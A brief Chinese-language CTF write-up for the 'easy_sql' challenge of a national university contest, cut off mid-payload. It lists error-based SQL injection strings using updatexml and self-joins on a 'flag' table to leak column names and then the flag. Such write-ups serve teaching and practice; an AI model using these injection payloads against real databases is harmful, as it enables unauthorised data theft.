第十四届全国大学生CTF比赛

easy_sql1、通过报错注入获取flag的字段名id11') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b)c)),0x2e)#2、通过的方式获取flag的字段名no11') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id))c)),0x2e)#3、在获取id及之后字段名no字段名’b803ed64-14a9-474f-9832-b854b23d3014’11') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id,no))c)),0x2e)#4、通过字段名获取flag的一部分12需要将单引号该成反引号`b803ed64-14a9-474f-9832-b854b23d3014`11') or updatexml(...

Submit